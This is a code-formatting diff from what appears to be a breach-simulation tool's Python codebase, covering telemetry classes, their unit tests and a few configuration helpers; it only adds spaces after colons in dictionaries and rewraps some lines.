data = super(VictimHostTelem, self).get_data() data = super(VictimHostTelem, self).get_data()
data.update({"machine":self.machine}) data.update({"machine": self.machine})
return data return data

View File

@ -19,9 +19,9 @@ class ExploitTelem(BaseTelem):
def get_data(self): def get_data(self):
return { return {
"result":self.result, "result": self.result,
"machine":self.exploiter.host.__dict__, "machine": self.exploiter.host.__dict__,
"exploiter":self.exploiter.__class__.__name__, "exploiter": self.exploiter.__class__.__name__,
"info":self.exploiter.exploit_info, "info": self.exploiter.exploit_info,
"attempts":self.exploiter.exploit_attempts, "attempts": self.exploiter.exploit_attempts,
} }

View File

@ -22,11 +22,11 @@ class PostBreachTelem(BaseTelem):
def get_data(self): def get_data(self):
return { return {
"command":self.pba.command, "command": self.pba.command,
"result":self.result, "result": self.result,
"name":self.pba.name, "name": self.pba.name,
"hostname":self.hostname, "hostname": self.hostname,
"ip":self.ip, "ip": self.ip,
} }
@staticmethod @staticmethod

View File

@ -16,4 +16,4 @@ class ScanTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCAN telem_category = TelemCategoryEnum.SCAN
def get_data(self): def get_data(self):
return {"machine":self.machine.as_dict(), "service_count":len(self.machine.services)} return {"machine": self.machine.as_dict(), "service_count": len(self.machine.services)}

View File

@ -14,4 +14,4 @@ class ScoutSuiteTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCOUTSUITE telem_category = TelemCategoryEnum.SCOUTSUITE
def get_data(self): def get_data(self):
return {"data":self.provider_data} return {"data": self.provider_data}

View File

@ -17,4 +17,4 @@ class StateTelem(BaseTelem):
telem_category = TelemCategoryEnum.STATE telem_category = TelemCategoryEnum.STATE
def get_data(self): def get_data(self):
return {"done":self.is_done, "version":self.version} return {"done": self.is_done, "version": self.version}

View File

@ -16,7 +16,7 @@ def attack_telem_test_instance():
def test_attack_telem_send(attack_telem_test_instance, spy_send_telemetry): def test_attack_telem_send(attack_telem_test_instance, spy_send_telemetry):
attack_telem_test_instance.send() attack_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":TECHNIQUE} expected_data = {"status": STATUS.value, "technique": TECHNIQUE}
expected_data = json.dumps(expected_data, cls=attack_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=attack_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -18,10 +18,10 @@ def T1005_telem_test_instance():
def test_T1005_send(T1005_telem_test_instance, spy_send_telemetry): def test_T1005_send(T1005_telem_test_instance, spy_send_telemetry):
T1005_telem_test_instance.send() T1005_telem_test_instance.send()
expected_data = { expected_data = {
"status":STATUS.value, "status": STATUS.value,
"technique":"T1005", "technique": "T1005",
"gathered_data_type":GATHERED_DATA_TYPE, "gathered_data_type": GATHERED_DATA_TYPE,
"info":INFO, "info": INFO,
} }
expected_data = json.dumps(expected_data, cls=T1005_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1005_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -16,7 +16,7 @@ def T1035_telem_test_instance():
def test_T1035_send(T1035_telem_test_instance, spy_send_telemetry): def test_T1035_send(T1035_telem_test_instance, spy_send_telemetry):
T1035_telem_test_instance.send() T1035_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1035", "usage":USAGE.name} expected_data = {"status": STATUS.value, "technique": "T1035", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1035_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1035_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack" assert spy_send_telemetry.telem_category == "attack"

View File

@ -16,7 +16,7 @@ def T1064_telem_test_instance():
def test_T1064_send(T1064_telem_test_instance, spy_send_telemetry): def test_T1064_send(T1064_telem_test_instance, spy_send_telemetry):
T1064_telem_test_instance.send() T1064_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1064", "usage":USAGE_STR} expected_data = {"status": STATUS.value, "technique": "T1064", "usage": USAGE_STR}
expected_data = json.dumps(expected_data, cls=T1064_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1064_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack" assert spy_send_telemetry.telem_category == "attack"

View File

@ -19,11 +19,11 @@ def T1105_telem_test_instance():
def test_T1105_send(T1105_telem_test_instance, spy_send_telemetry): def test_T1105_send(T1105_telem_test_instance, spy_send_telemetry):
T1105_telem_test_instance.send() T1105_telem_test_instance.send()
expected_data = { expected_data = {
"status":STATUS.value, "status": STATUS.value,
"technique":"T1105", "technique": "T1105",
"filename":FILENAME, "filename": FILENAME,
"src":SRC_IP, "src": SRC_IP,
"dst":DST_IP, "dst": DST_IP,
} }
expected_data = json.dumps(expected_data, cls=T1105_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1105_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -16,7 +16,7 @@ def T1106_telem_test_instance():
def test_T1106_send(T1106_telem_test_instance, spy_send_telemetry): def test_T1106_send(T1106_telem_test_instance, spy_send_telemetry):
T1106_telem_test_instance.send() T1106_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1106", "usage":USAGE.name} expected_data = {"status": STATUS.value, "technique": "T1106", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1106_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1106_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack" assert spy_send_telemetry.telem_category == "attack"

View File

@ -16,7 +16,7 @@ def T1107_telem_test_instance():
def test_T1107_send(T1107_telem_test_instance, spy_send_telemetry): def test_T1107_send(T1107_telem_test_instance, spy_send_telemetry):
T1107_telem_test_instance.send() T1107_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1107", "path":PATH} expected_data = {"status": STATUS.value, "technique": "T1107", "path": PATH}
expected_data = json.dumps(expected_data, cls=T1107_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1107_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack" assert spy_send_telemetry.telem_category == "attack"

View File

@ -16,7 +16,7 @@ def T1129_telem_test_instance():
def test_T1129_send(T1129_telem_test_instance, spy_send_telemetry): def test_T1129_send(T1129_telem_test_instance, spy_send_telemetry):
T1129_telem_test_instance.send() T1129_telem_test_instance.send()
expected_data = {"status":STATUS.value, "technique":"T1129", "usage":USAGE.name} expected_data = {"status": STATUS.value, "technique": "T1129", "usage": USAGE.name}
expected_data = json.dumps(expected_data, cls=T1129_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1129_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack" assert spy_send_telemetry.telem_category == "attack"

View File

@ -21,10 +21,10 @@ def T1197_telem_test_instance():
def test_T1197_send(T1197_telem_test_instance, spy_send_telemetry): def test_T1197_send(T1197_telem_test_instance, spy_send_telemetry):
T1197_telem_test_instance.send() T1197_telem_test_instance.send()
expected_data = { expected_data = {
"status":STATUS.value, "status": STATUS.value,
"technique":"T1197", "technique": "T1197",
"machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP}, "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
"usage":USAGE_STR, "usage": USAGE_STR,
} }
expected_data = json.dumps(expected_data, cls=T1197_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1197_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -21,10 +21,10 @@ def T1222_telem_test_instance():
def test_T1222_send(T1222_telem_test_instance, spy_send_telemetry): def test_T1222_send(T1222_telem_test_instance, spy_send_telemetry):
T1222_telem_test_instance.send() T1222_telem_test_instance.send()
expected_data = { expected_data = {
"status":STATUS.value, "status": STATUS.value,
"technique":"T1222", "technique": "T1222",
"machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP}, "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
"command":COMMAND, "command": COMMAND,
} }
expected_data = json.dumps(expected_data, cls=T1222_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=T1222_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -18,9 +18,9 @@ def usage_telem_test_instance():
def test_usage_telem_send(usage_telem_test_instance, spy_send_telemetry): def test_usage_telem_send(usage_telem_test_instance, spy_send_telemetry):
usage_telem_test_instance.send() usage_telem_test_instance.send()
expected_data = { expected_data = {
"status":STATUS.value, "status": STATUS.value,
"technique":TECHNIQUE, "technique": TECHNIQUE,
"usage":USAGE.name, "usage": USAGE.name,
} }
expected_data = json.dumps(expected_data, cls=usage_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=usage_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -21,9 +21,9 @@ def victim_host_telem_test_instance():
def test_victim_host_telem_send(victim_host_telem_test_instance, spy_send_telemetry): def test_victim_host_telem_send(victim_host_telem_test_instance, spy_send_telemetry):
victim_host_telem_test_instance.send() victim_host_telem_test_instance.send()
expected_data = { expected_data = {
"status":STATUS.value, "status": STATUS.value,
"technique":TECHNIQUE, "technique": TECHNIQUE,
"machine":{"domain_name":DOMAIN_NAME, "ip_addr":IP}, "machine": {"domain_name": DOMAIN_NAME, "ip_addr": IP},
} }
expected_data = json.dumps(expected_data, cls=victim_host_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=victim_host_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -10,24 +10,24 @@ DOMAIN_NAME = "domain-name"
IP = "0.0.0.0" IP = "0.0.0.0"
HOST = VictimHost(IP, DOMAIN_NAME) HOST = VictimHost(IP, DOMAIN_NAME)
HOST_AS_DICT = { HOST_AS_DICT = {
"ip_addr":IP, "ip_addr": IP,
"domain_name":DOMAIN_NAME, "domain_name": DOMAIN_NAME,
"os":{}, "os": {},
"services":{}, "services": {},
"icmp":False, "icmp": False,
"monkey_exe":None, "monkey_exe": None,
"default_tunnel":None, "default_tunnel": None,
"default_server":None, "default_server": None,
} }
EXPLOITER = WmiExploiter(HOST) EXPLOITER = WmiExploiter(HOST)
EXPLOITER_NAME = "WmiExploiter" EXPLOITER_NAME = "WmiExploiter"
EXPLOITER_INFO = { EXPLOITER_INFO = {
"display_name":WmiExploiter._EXPLOITED_SERVICE, "display_name": WmiExploiter._EXPLOITED_SERVICE,
"started":"", "started": "",
"finished":"", "finished": "",
"vulnerable_urls":[], "vulnerable_urls": [],
"vulnerable_ports":[], "vulnerable_ports": [],
"executed_cmds":[], "executed_cmds": [],
} }
EXPLOITER_ATTEMPTS = [] EXPLOITER_ATTEMPTS = []
RESULT = False RESULT = False
@ -41,11 +41,11 @@ def exploit_telem_test_instance():
def test_exploit_telem_send(exploit_telem_test_instance, spy_send_telemetry): def test_exploit_telem_send(exploit_telem_test_instance, spy_send_telemetry):
exploit_telem_test_instance.send() exploit_telem_test_instance.send()
expected_data = { expected_data = {
"result":RESULT, "result": RESULT,
"machine":HOST_AS_DICT, "machine": HOST_AS_DICT,
"exploiter":EXPLOITER_NAME, "exploiter": EXPLOITER_NAME,
"info":EXPLOITER_INFO, "info": EXPLOITER_INFO,
"attempts":EXPLOITER_ATTEMPTS, "attempts": EXPLOITER_ATTEMPTS,
} }
expected_data = json.dumps(expected_data, cls=exploit_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=exploit_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -20,18 +20,18 @@ class StubSomePBA:
@pytest.fixture @pytest.fixture
def post_breach_telem_test_instance(monkeypatch): def post_breach_telem_test_instance(monkeypatch):
PBA = StubSomePBA() PBA = StubSomePBA()
monkeypatch.setattr(PostBreachTelem, "_get_hostname_and_ip", lambda:(HOSTNAME, IP)) monkeypatch.setattr(PostBreachTelem, "_get_hostname_and_ip", lambda: (HOSTNAME, IP))
return PostBreachTelem(PBA, RESULT) return PostBreachTelem(PBA, RESULT)
def test_post_breach_telem_send(post_breach_telem_test_instance, spy_send_telemetry): def test_post_breach_telem_send(post_breach_telem_test_instance, spy_send_telemetry):
post_breach_telem_test_instance.send() post_breach_telem_test_instance.send()
expected_data = { expected_data = {
"command":PBA_COMMAND, "command": PBA_COMMAND,
"result":RESULT, "result": RESULT,
"name":PBA_NAME, "name": PBA_NAME,
"hostname":HOSTNAME, "hostname": HOSTNAME,
"ip":IP, "ip": IP,
} }
expected_data = json.dumps(expected_data, cls=post_breach_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=post_breach_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -9,14 +9,14 @@ DOMAIN_NAME = "domain-name"
IP = "0.0.0.0" IP = "0.0.0.0"
HOST = VictimHost(IP, DOMAIN_NAME) HOST = VictimHost(IP, DOMAIN_NAME)
HOST_AS_DICT = { HOST_AS_DICT = {
"ip_addr":IP, "ip_addr": IP,
"domain_name":DOMAIN_NAME, "domain_name": DOMAIN_NAME,
"os":{}, "os": {},
"services":{}, "services": {},
"icmp":False, "icmp": False,
"monkey_exe":None, "monkey_exe": None,
"default_tunnel":None, "default_tunnel": None,
"default_server":None, "default_server": None,
} }
HOST_SERVICES = {} HOST_SERVICES = {}
@ -28,7 +28,7 @@ def scan_telem_test_instance():
def test_scan_telem_send(scan_telem_test_instance, spy_send_telemetry): def test_scan_telem_send(scan_telem_test_instance, spy_send_telemetry):
scan_telem_test_instance.send() scan_telem_test_instance.send()
expected_data = {"machine":HOST_AS_DICT, "service_count":len(HOST_SERVICES)} expected_data = {"machine": HOST_AS_DICT, "service_count": len(HOST_SERVICES)}
expected_data = json.dumps(expected_data, cls=scan_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=scan_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -15,7 +15,7 @@ def state_telem_test_instance():
def test_state_telem_send(state_telem_test_instance, spy_send_telemetry): def test_state_telem_send(state_telem_test_instance, spy_send_telemetry):
state_telem_test_instance.send() state_telem_test_instance.send()
expected_data = {"done":IS_DONE, "version":VERSION} expected_data = {"done": IS_DONE, "version": VERSION}
expected_data = json.dumps(expected_data, cls=state_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=state_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -14,7 +14,7 @@ def trace_telem_test_instance():
def test_trace_telem_send(trace_telem_test_instance, spy_send_telemetry): def test_trace_telem_send(trace_telem_test_instance, spy_send_telemetry):
trace_telem_test_instance.send() trace_telem_test_instance.send()
expected_data = {"msg":MSG} expected_data = {"msg": MSG}
expected_data = json.dumps(expected_data, cls=trace_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=trace_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -12,7 +12,7 @@ def tunnel_telem_test_instance():
def test_tunnel_telem_send(tunnel_telem_test_instance, spy_send_telemetry): def test_tunnel_telem_send(tunnel_telem_test_instance, spy_send_telemetry):
tunnel_telem_test_instance.send() tunnel_telem_test_instance.send()
expected_data = {"proxy":None} expected_data = {"proxy": None}
expected_data = json.dumps(expected_data, cls=tunnel_telem_test_instance.json_encoder) expected_data = json.dumps(expected_data, cls=tunnel_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data assert spy_send_telemetry.data == expected_data

View File

@ -21,4 +21,4 @@ class TraceTelem(BaseTelem):
telem_category = TelemCategoryEnum.TRACE telem_category = TelemCategoryEnum.TRACE
def get_data(self): def get_data(self):
return {"msg":self.msg} return {"msg": self.msg}

View File

@ -16,4 +16,4 @@ class TunnelTelem(BaseTelem):
telem_category = TelemCategoryEnum.TUNNEL telem_category = TelemCategoryEnum.TUNNEL
def get_data(self): def get_data(self):
return {"proxy":self.proxy} return {"proxy": self.proxy}

View File

@ -82,8 +82,7 @@ class AutoNewWindowsUser(AutoNewUser):
thread_handle = proc_info.hThread thread_handle = proc_info.hThread
logger.debug( logger.debug(
"Waiting for process to finish. Timeout: {}ms".format( "Waiting for process to finish. Timeout: {}ms".format(WAIT_TIMEOUT_IN_MILLISECONDS)
WAIT_TIMEOUT_IN_MILLISECONDS)
) )
# https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f # https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f

View File

@ -46,8 +46,7 @@ class WindowsUpgrader(object):
) )
monkey_cmdline = ( monkey_cmdline = (
MONKEY_CMDLINE_WINDOWS % { MONKEY_CMDLINE_WINDOWS % {"monkey_path": WormConfiguration.dropper_target_path_win_64}
"monkey_path":WormConfiguration.dropper_target_path_win_64}
+ monkey_options + monkey_options
) )

View File

@ -175,7 +175,7 @@ def init_app(mongo_url):
app = Flask(__name__) app = Flask(__name__)
api = flask_restful.Api(app) api = flask_restful.Api(app)
api.representations = {"application/json":output_json} api.representations = {"application/json": output_json}
init_app_config(app, mongo_url) init_app_config(app, mongo_url)
init_app_services(app) init_app_services(app)

View File

@ -58,12 +58,12 @@ class EnvironmentConfig:
def to_dict(self) -> Dict: def to_dict(self) -> Dict:
config_dict = { config_dict = {
"server_config":self.server_config, "server_config": self.server_config,
"deployment":self.deployment, "deployment": self.deployment,
"data_dir":self.data_dir, "data_dir": self.data_dir,
} }
if self.aws: if self.aws:
config_dict.update({"aws":self.aws}) config_dict.update({"aws": self.aws})
config_dict.update(self.user_creds.to_dict()) config_dict.update(self.user_creds.to_dict())
return config_dict return config_dict

View File

@ -13,9 +13,9 @@ STANDARD = "standard"
PASSWORD = "password" PASSWORD = "password"
ENV_DICT = { ENV_DICT = {
STANDARD:standard.StandardEnvironment, STANDARD: standard.StandardEnvironment,
AWS:aws.AwsEnvironment, AWS: aws.AwsEnvironment,
PASSWORD:password.PasswordEnvironment, PASSWORD: password.PasswordEnvironment,
} }
env = None env = None

View File

@ -9,13 +9,13 @@ class TestUserCreds(TestCase):
self.assertDictEqual(user_creds.to_dict(), {}) self.assertDictEqual(user_creds.to_dict(), {})
user_creds = UserCreds(username="Test") user_creds = UserCreds(username="Test")
self.assertDictEqual(user_creds.to_dict(), {"user":"Test"}) self.assertDictEqual(user_creds.to_dict(), {"user": "Test"})
user_creds = UserCreds(password_hash="abc1231234") user_creds = UserCreds(password_hash="abc1231234")
self.assertDictEqual(user_creds.to_dict(), {"password_hash":"abc1231234"}) self.assertDictEqual(user_creds.to_dict(), {"password_hash": "abc1231234"})
user_creds = UserCreds(username="Test", password_hash="abc1231234") user_creds = UserCreds(username="Test", password_hash="abc1231234")
self.assertDictEqual(user_creds.to_dict(), {"user":"Test", "password_hash":"abc1231234"}) self.assertDictEqual(user_creds.to_dict(), {"user": "Test", "password_hash": "abc1231234"})
def test_to_auth_user(self): def test_to_auth_user(self):
user_creds = UserCreds(username="Test", password_hash="abc1231234") user_creds = UserCreds(username="Test", password_hash="abc1231234")

View File

@ -17,9 +17,9 @@ class UserCreds:
def to_dict(self) -> Dict: def to_dict(self) -> Dict:
cred_dict = {} cred_dict = {}
if self.username: if self.username:
cred_dict.update({"user":self.username}) cred_dict.update({"user": self.username})
if self.password_hash: if self.password_hash:
cred_dict.update({"password_hash":self.password_hash}) cred_dict.update({"password_hash": self.password_hash})
return cred_dict return cred_dict
def to_auth_user(self) -> User: def to_auth_user(self) -> User:

Some files were not shown because too many files have changed in this diff Show More